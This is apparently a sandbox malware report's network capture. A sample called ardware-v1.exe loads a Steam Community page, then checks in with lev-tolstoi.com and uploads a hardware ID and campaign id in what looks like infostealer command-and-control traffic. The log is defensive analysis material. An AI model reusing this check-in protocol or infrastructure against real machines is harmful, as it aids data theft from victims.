2024-12-18 08:58:46 UTC | 1905 | IN |
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Wed, 18 Dec 2024 08:58:46 GMT
    Content-Length: 35121
    Connection: close
    Set-Cookie: sessionid=2151b6b24648c1caa410d44f; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-18 08:58:46 UTC | 14479 | IN |
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                              2024-12-18 08:58:46 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                              Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                              2024-12-18 08:58:46 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                              Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | 7748 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:58:47 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-18 08:58:47 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-18 08:58:49 UTC | 1039 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:58:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=tkcbcl124rp2qug0ak1me8ftea; expires=Sun, 13-Apr-2025 02:45:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bi0GaSrEgKd6CRwOQgyHKAbg%2Fw1%2BQsbmoe3fZFm%2FrGAYBzT0BR3Gb5UU4MR1TkXiDWvh7WNutEDmvcRmxmtTxgaCgzaIatRzM%2FVJLvBggp3OBiwYX0ZlDsQyqeM8XO%2BEwQA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3df4036b75428e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1572&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1789215&cwnd=222&unsent_bytes=0&cid=47761f27d97e0afc&ts=1127&x=0"
2024-12-18 08:58:49 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-18 08:58:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49716 | 104.21.66.86 | 443 | 7748 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:58:50 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 42
Host: lev-tolstoi.com
2024-12-18 08:58:50 UTC | 42 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 66 4c 38 72 65 2d 2d 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=tfL8re--&j=
2024-12-18 08:58:51 UTC | 1044 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:58:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=trbdf5350id2jvlv1vmvj0muea; expires=Sun, 13-Apr-2025 02:45:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PVrvMVj04B%2BgCO%2B0Vtejo6tWXmcHV%2FUf%2B%2FIhZTLlyQoereGl3tHbFLvIzuOqsESeT%2B2ouSUWHIr2xQ92daDPatx2X6v65vOYpMYYrRncv4s49oYukvdScemWk%2B%2Bya1FH1U%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3df4134a215e6d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1591&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=941&delivery_rate=1681059&cwnd=252&unsent_bytes=0&cid=c08a1d28928afdfd&ts=835&x=0"
2024-12-18 08:58:51 UTC | 325 | IN | Data Raw: 34 65 31 0d 0a 42 35 73 61 6f 67 6e 30 50 68 53 32 50 2b 58 47 34 41 69 79 32 64 56 2b 75 6b 6f 56 48 51 79 6c 4e 49 4b 65 74 48 36 61 45 36 4a 38 75 57 79 41 4d 38 41 53 4e 73 56 61 78 2f 79 55 65 73 65 38 2b 56 7a 62 4c 6a 63 6e 61 73 52 59 38 66 75 59 58 4f 78 2b 67 44 33 39 65 38 35 36 6b 52 49 32 30 30 66 48 2f 4c 74 7a 6b 4c 79 37 58 49 42 6f 63 48 64 75 78 46 6a 67 2f 39 38 52 36 6e 2f 42 62 2f 64 39 79 6d 79 58 57 6e 58 61 55 6f 43 6a 68 57 6e 59 74 37 77 54 30 69 63 33 4d 53 37 41 54 71 43 6b 6c 6a 50 2f 5a 38 4e 4b 2b 6d 6e 4a 4b 34 6b 53 62 35 52 61 69 2b 54 61 4b 74 4f 38 74 78 4c 63 4c 6e 35 31 5a 4d 31 51 34 66 72 65 44 76 4e 31 79 6d 2f 35 66 73 74 6d 6e 6b 35 34 30 46 57 4c 70 59 39 70 6b 50 58 33 47 38 42 6f 4c 7a 38 39 39 56 58 78 37 63
Data Ascii: 4e1B5saogn0PhS2P+XG4Aiy2dV+ukoVHQylNIKetH6aE6J8uWyAM8ASNsVax/yUese8+VzbLjcnasRY8fuYXOx+gD39e856kRI200fH/LtzkLy7XIBocHduxFjg/98R6n/Bb/d9ymyXWnXaUoCjhWnYt7wT0ic3MS7ATqCkljP/Z8NK+mnJK4kSb5Rai+TaKtO8txLcLn51ZM1Q4freDvN1ym/5fstmnk540FWLpY9pkPX3G8BoLz899VXx7c
2024-12-18 08:58:51 UTC | 931 | IN | Data Raw: 39 7a 7a 49 4b 33 52 72 59 39 59 57 2f 37 4c 50 58 50 39 39 67 44 32 35 66 73 35 71 6d 31 78 6b 33 46 61 4d 6f 5a 42 68 32 62 61 36 48 4e 55 69 65 48 78 75 77 46 7a 71 38 39 77 59 39 58 7a 47 5a 66 6b 34 6a 69 75 52 52 44 61 4d 48 61 53 68 6b 6d 33 63 72 66 55 6d 6d 44 63 35 5a 69 37 41 57 71 43 6b 6c 68 54 39 63 73 4e 75 39 6e 76 49 59 49 52 63 5a 4e 4a 51 67 72 61 45 62 39 36 78 74 41 37 53 4a 6e 46 38 5a 38 78 66 35 66 76 53 58 4c 59 78 78 33 32 35 49 49 42 4b 6d 31 64 36 33 6b 71 48 35 4a 30 6b 79 66 75 77 45 4a 68 77 4e 33 74 76 77 31 66 6b 38 74 67 59 39 48 66 4f 61 50 5a 2b 79 6d 75 52 56 6e 37 63 58 49 71 76 6a 57 72 56 74 72 4d 61 31 43 6c 79 50 79 43 48 55 66 69 38 6a 6c 7a 57 64 73 4e 33 75 30 33 44 5a 5a 68 62 59 4a 52 43 79 62 33 43 62 64 7a
Data Ascii: 9zzIK3RrY9YW/7LPXP99gD25fs5qm1xk3FaMoZBh2ba6HNUieHxuwFzq89wY9XzGZfk4jiuRRDaMHaShkm3crfUmmDc5Zi7AWqCklhT9csNu9nvIYIRcZNJQgraEb96xtA7SJnF8Z8xf5fvSXLYxx325IIBKm1d63kqH5J0kyfuwEJhwN3tvw1fk8tgY9HfOaPZ+ymuRVn7cXIqvjWrVtrMa1ClyPyCHUfi8jlzWdsN3u03DZZhbYJRCyb3Cbdz
2024-12-18 08:58:51 UTC | 1369 | IN | Data Raw: 34 34 33 62 0d 0a 6c 57 50 70 49 39 72 32 37 4f 78 45 64 4d 6e 65 48 68 6d 78 46 72 6c 38 64 56 63 74 6a 48 48 66 62 6b 67 67 45 36 59 58 32 66 46 48 37 4b 6e 6a 47 54 58 72 66 63 44 6c 6a 45 33 65 47 4b 48 44 71 44 32 30 52 76 38 66 4d 70 6d 2f 58 7a 4e 5a 4a 39 56 66 38 5a 58 69 36 71 51 5a 39 71 2b 75 52 44 64 4a 33 64 2b 62 38 6c 63 36 37 79 59 58 50 39 70 67 44 32 35 56 38 31 37 68 46 5a 39 78 52 2b 79 70 34 78 6b 31 36 33 33 41 35 59 78 4e 33 68 69 68 77 36 67 39 39 41 51 39 48 48 47 64 2f 64 33 30 6d 47 45 57 48 6a 51 55 59 6d 74 6a 32 58 56 71 62 4d 63 79 69 6c 79 65 47 44 4b 52 4f 57 38 6d 46 7a 2f 61 59 41 39 75 55 4c 30 62 49 5a 4e 63 5a 5a 6f 68 4b 71 4d 62 63 62 37 71 46 4c 42 61 48 42 7a 4c 70 38 57 34 2f 44 62 46 66 31 2b 30 6d 2f 31 65 64
Data Ascii: 443blWPpI9r27OxEdMneHhmxFrl8dVctjHHfbkggE6YX2fFH7KnjGTXrfcDljE3eGKHDqD20Rv8fMpm/XzNZJ9Vf8ZXi6qQZ9q+uRDdJ3d+b8lc67yYXP9pgD25V817hFZ9xR+yp4xk1633A5YxN3hihw6g99AQ9HHGd/d30mGEWHjQUYmtj2XVqbMcyilyeGDKROW8mFz/aYA9uUL0bIZNcZZohKqMbcb7qFLBaHBzLp8W4/DbFf1+0m/1ed
2024-12-18 08:58:51 UTC | 1369 | IN | Data Raw: 65 4e 42 58 67 71 43 4f 59 4e 43 2b 70 52 54 65 4c 33 74 33 61 38 68 51 35 66 48 52 46 2f 74 6a 30 6d 62 39 64 73 77 72 32 42 78 78 7a 42 33 66 35 4b 64 39 30 36 75 78 48 35 67 33 4f 57 59 75 77 46 71 67 70 4a 59 63 39 6e 33 4c 59 76 4a 7a 78 47 2b 57 55 58 33 61 55 34 36 6f 69 6d 62 58 71 62 6f 5a 30 43 4a 2b 65 6d 4c 4b 56 66 4c 2f 31 31 79 32 4d 63 64 39 75 53 43 41 54 4b 56 72 56 5a 52 43 79 62 33 43 62 64 7a 37 37 31 7a 5a 49 48 42 78 61 74 56 59 38 76 4c 52 48 50 35 35 79 47 4c 31 64 73 35 35 6e 6c 31 32 32 6c 4b 50 72 59 5a 72 31 4c 2b 37 47 35 68 6d 4e 33 68 32 68 77 36 67 31 4e 55 47 34 6a 50 75 62 76 6c 2f 30 48 32 4e 48 47 6d 61 52 4d 65 6a 6a 69 71 49 2b 37 4d 58 30 69 46 30 64 6d 72 4b 56 75 6e 7a 33 78 54 31 65 64 4a 6b 38 32 72 45 62 70 64
Data Ascii: eNBXgqCOYNC+pRTeL3t3a8hQ5fHRF/tj0mb9dswr2BxxzB3f5Kd906uxH5g3OWYuwFqgpJYc9n3LYvJzxG+WUX3aU46oimbXqboZ0CJ+emLKVfL/11y2Mcd9uSCATKVrVZRCyb3Cbdz771zZIHBxatVY8vLRHP55yGL1ds55nl122lKPrYZr1L+7G5hmN3h2hw6g1NUG4jPubvl/0H2NHGmaRMejjiqI+7MX0iF0dmrKVunz3xT1edJk82rEbpd
2024-12-18 08:58:51 UTC | 1369 | IN | Data Raw: 6f 2b 70 67 57 4c 43 75 37 6f 63 79 6a 70 78 64 47 43 48 47 4b 44 37 7a 6c 79 67 4d 66 46 79 38 6a 6a 66 4a 59 38 63 63 64 67 64 33 2b 53 42 59 4e 32 31 70 52 6a 65 49 33 52 78 5a 73 4a 65 35 50 62 62 45 2f 4e 37 79 57 33 35 64 38 56 6a 6e 56 70 34 31 56 75 4c 71 63 49 6b 6b 4c 79 76 58 49 42 6f 55 47 56 6a 77 55 48 78 79 64 45 63 71 54 48 66 4b 2b 41 34 78 32 66 57 42 44 62 5a 55 59 32 70 68 32 37 59 76 4c 51 64 31 43 78 36 63 6d 72 4f 55 75 58 75 78 42 72 32 63 63 39 72 39 6e 54 53 5a 5a 4e 63 65 70 51 54 78 36 4f 61 4b 6f 6a 37 68 67 76 59 61 47 67 78 64 34 64 52 37 4c 79 4f 58 50 64 38 30 6d 6e 32 65 4d 46 6f 6b 6c 64 78 30 6c 75 47 70 34 64 70 31 62 32 32 48 4e 51 69 63 48 64 6b 79 56 76 6d 2b 4e 41 61 75 44 2b 41 59 75 45 34 6d 43 75 6b 55 58 6a 64
Data Ascii: o+pgWLCu7ocyjpxdGCHGKD7zlygMfFy8jjfJY8ccdgd3+SBYN21pRjeI3RxZsJe5PbbE/N7yW35d8VjnVp41VuLqcIkkLyvXIBoUGVjwUHxydEcqTHfK+A4x2fWBDbZUY2ph27YvLQd1Cx6cmrOUuXuxBr2cc9r9nTSZZNcepQTx6OaKoj7hgvYaGgxd4dR7LyOXPd80mn2eMFokldx0luGp4dp1b22HNQicHdkyVvm+NAauD+AYuE4mCukUXjd
2024-12-18 08:58:51 UTC | 1369 | IN | Data Raw: 31 74 32 4c 53 7a 48 4e 64 6f 4f 54 39 70 33 78 61 34 76 50 59 58 37 6c 44 4f 62 75 73 34 33 79 57 50 48 48 48 59 48 64 2f 6b 6a 47 50 52 73 37 6b 51 30 43 78 6c 66 32 58 4f 57 65 48 7a 31 68 2f 35 65 38 68 33 2f 33 6a 4c 59 35 46 55 63 74 70 50 68 71 76 43 4a 4a 43 38 72 31 79 41 61 45 5a 70 61 63 42 5a 6f 74 58 52 42 2f 6c 37 77 32 37 31 4f 4e 38 6c 6a 78 78 78 32 42 33 66 35 49 39 6d 33 62 2b 6c 45 4e 67 6f 66 6e 68 6b 31 56 6e 76 38 64 55 63 2f 57 50 42 64 2f 5a 7a 78 57 69 53 55 33 6e 59 56 59 33 6b 7a 43 72 58 6f 2f 64 45 6d 41 52 30 62 6d 53 46 63 66 72 71 30 52 44 70 65 73 31 70 75 57 65 4f 63 74 5a 62 65 70 51 46 78 36 53 44 5a 38 4b 2b 74 68 62 53 4a 58 39 77 61 38 4a 5a 35 50 6a 64 45 75 70 2f 7a 32 58 2f 63 38 46 75 6c 56 64 38 32 6c 53 56 35
Data Ascii: 1t2LSzHNdoOT9p3xa4vPYX7lDObus43yWPHHHYHd/kjGPRs7kQ0Cxlf2XOWeHz1h/5e8h3/3jLY5FUctpPhqvCJJC8r1yAaEZpacBZotXRB/l7w271ON8ljxxx2B3f5I9m3b+lENgofnhk1Vnv8dUc/WPBd/ZzxWiSU3nYVY3kzCrXo/dEmAR0bmSFcfrq0RDpes1puWeOctZbepQFx6SDZ8K+thbSJX9wa8JZ5PjdEup/z2X/c8FulVd82lSV5
2024-12-18 08:58:51 UTC | 1369 | IN | Data Raw: 7a 74 42 6e 64 49 6e 74 7a 62 38 39 66 36 76 6e 54 47 76 4a 79 7a 6d 72 34 64 4d 52 69 6d 46 55 32 6d 68 32 41 76 4d 49 79 6b 49 32 6e 47 38 41 6c 5a 7a 31 63 78 45 66 78 36 64 73 4d 2f 6a 50 76 5a 76 56 37 78 57 79 47 48 47 6d 61 52 4d 65 6a 6a 69 71 49 2b 37 63 59 31 43 74 77 63 57 48 4b 57 65 66 33 32 52 62 32 59 38 39 67 38 58 54 49 5a 6f 52 57 66 4d 5a 55 6a 71 6d 4d 59 73 4b 34 39 31 4b 59 4c 32 38 2f 4e 6f 64 6b 36 76 2f 61 43 76 56 2b 67 48 71 33 59 59 42 73 6d 68 77 75 6c 45 2b 56 70 49 6c 71 31 37 57 6c 48 64 41 6e 66 58 39 6f 7a 46 7a 6a 39 64 49 53 38 58 66 42 61 50 68 35 77 47 36 57 56 57 54 5a 48 63 6e 6b 68 58 4b 51 34 2f 63 72 31 43 4e 47 66 48 69 48 53 61 37 6c 6c 68 76 30 4d 5a 67 6c 2b 47 72 4e 59 35 4a 63 65 39 4a 57 68 71 57 42 61 74
Data Ascii: ztBndIntzb89f6vnTGvJyzmr4dMRimFU2mh2AvMIykI2nG8AlZz1cxEfx6dsM/jPvZvV7xWyGHGmaRMejjiqI+7cY1CtwcWHKWef32Rb2Y89g8XTIZoRWfMZUjqmMYsK491KYL28/Nodk6v/aCvV+gHq3YYBsmhwulE+VpIlq17WlHdAnfX9ozFzj9dIS8XfBaPh5wG6WVWTZHcnkhXKQ4/cr1CNGfHiHSa7llhv0MZgl+GrNY5Jce9JWhqWBat
2024-12-18 08:58:51 UTC | 1369 | IN | Data Raw: 67 47 67 77 66 48 7a 56 55 4f 50 71 31 56 76 47 54 2b 42 75 37 33 6e 4e 59 4a 70 69 53 4d 46 65 69 61 71 46 66 4d 48 37 2b 56 7a 58 61 43 39 47 4c 6f 38 57 33 37 4b 57 42 4c 67 70 67 46 44 36 64 73 35 73 67 45 30 37 39 46 61 52 70 59 39 68 33 50 6d 32 45 63 67 76 4e 7a 45 75 77 52 61 34 72 4a 68 63 2f 47 43 41 50 61 6b 71 6d 7a 37 46 43 79 61 47 51 73 6d 39 77 6e 79 51 34 2b 56 53 6d 44 6f 33 4a 79 36 41 56 66 4c 75 30 42 2f 75 63 6f 64 62 78 31 6a 4c 5a 35 56 51 64 39 4d 64 79 65 53 4e 4b 6f 69 43 39 78 2f 4b 4f 6a 68 75 65 4d 70 47 35 37 44 65 44 66 56 39 67 43 75 35 4e 4d 52 67 6d 6c 6c 78 78 42 4b 56 74 49 6c 6d 78 76 65 7a 44 70 68 6d 4e 32 35 6c 79 45 54 75 2b 35 6b 4e 37 6e 7a 51 5a 76 78 2f 6a 47 4f 48 55 58 71 55 45 38 65 78 69 57 62 57 74 71 4a
Data Ascii: gGgwfHzVUOPq1VvGT+Bu73nNYJpiSMFeiaqFfMH7+VzXaC9GLo8W37KWBLgpgFD6ds5sgE079FaRpY9h3Pm2EcgvNzEuwRa4rJhc/GCAPakqmz7FCyaGQsm9wnyQ4+VSmDo3Jy6AVfLu0B/ucodbx1jLZ5VQd9MdyeSNKoiC9x/KOjhueMpG57DeDfV9gCu5NMRgmllxxBKVtIlmxvezDphmN25lyETu+5kN7nzQZvx/jGOHUXqUE8exiWbWtqJ
2024-12-18 08:58:51 UTC | 1369 | IN | Data Raw: 7a 4e 2f 31 46 6a 72 36 74 46 63 78 7a 2b 41 66 62 6b 67 67 46 36 56 55 6e 6a 54 53 35 62 70 70 47 6e 58 76 62 51 53 7a 7a 6b 33 4d 53 37 42 46 72 69 75 6d 46 7a 38 59 49 41 39 71 53 71 62 50 73 55 4c 4a 6f 5a 43 79 62 33 43 66 4a 44 6a 35 46 4b 59 4f 6a 63 6e 4c 6f 42 59 37 66 33 56 45 76 74 6a 30 6d 50 36 62 73 4d 73 71 47 4a 54 32 56 43 43 71 6f 56 55 37 70 71 39 44 4e 55 6e 63 45 46 51 38 45 66 6e 37 4a 51 36 2b 32 66 44 4a 62 63 34 32 43 76 4f 48 46 66 65 54 59 71 72 68 53 71 65 2b 37 4e 63 67 47 68 53 63 6d 50 43 57 4f 65 2b 39 78 62 6f 66 4d 39 69 75 54 61 41 5a 39 59 45 4e 74 56 58 6c 36 6d 4e 62 5a 79 38 72 52 75 59 5a 6a 64 78 4c 70 38 57 34 66 62 47 45 66 64 32 6a 47 50 33 64 6f 42 30 32 45 55 32 77 68 33 66 39 38 77 71 77 76 76 76 58 4a 38 6d
Data Ascii: zN/1Fjr6tFcxz+AfbkggF6VUnjTS5bppGnXvbQSzzk3MS7BFriumFz8YIA9qSqbPsULJoZCyb3CfJDj5FKYOjcnLoBY7f3VEvtj0mP6bsMsqGJT2VCCqoVU7pq9DNUncEFQ8Efn7JQ6+2fDJbc42CvOHFfeTYqrhSqe+7NcgGhScmPCWOe+9xbofM9iuTaAZ9YENtVXl6mNbZy8rRuYZjdxLp8W4fbGEfd2jGP3doB02EU2wh3f98wqwvvvXJ8m


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49717 | 104.21.66.86 | 443 | 7748 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:58:53 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0SYGSMFUW8EWPM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12817
Host: lev-tolstoi.com
2024-12-18 08:58:53 UTC | 12817 | OUT | Data Raw: 2d 2d 30 53 59 47 53 4d 46 55 57 38 45 57 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 53 59 47 53 4d 46 55 57 38 45 57 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 53 59 47 53 4d 46 55 57 38 45 57 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 30 53 59 47 53 4d 46 55 57 38 45 57 50
Data Ascii: --0SYGSMFUW8EWPMContent-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--0SYGSMFUW8EWPMContent-Disposition: form-data; name="pid"2--0SYGSMFUW8EWPMContent-Disposition: form-data; name="lid"tfL8re----0SYGSMFUW8EWP (the report drops the CR/LF separators between the multipart parts; the dump is truncated after the lid field)
2024-12-18 08:58:54 UTC | 1036 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:58:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=oduhjumptfj0s9q6n9udkm596b; expires=Sun, 13-Apr-2025 02:45:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qNmQvUQMKiJ6j0%2FfVNfHzVxYllXBlVyto8bEilfGqDlpd93UXCCA%2BCi70qGoWOzRR7RjzImAwa3aYLGpXDEBt5SY0T3aMm0ILioCHeQPaRRI0bdSMaWduKkgix6nSkstjy8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3df4257d535e64-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1588&rtt_var=599&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13752&delivery_rate=1819314&cwnd=245&unsent_bytes=0&cid=a207020de59a41bc&ts=925&x=0"
2024-12-18 08:58:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189 (chunk-size line "f" = 15 bytes, followed by the 15-byte body "ok 8.46.123.189"; the report drops the CR/LF separators)
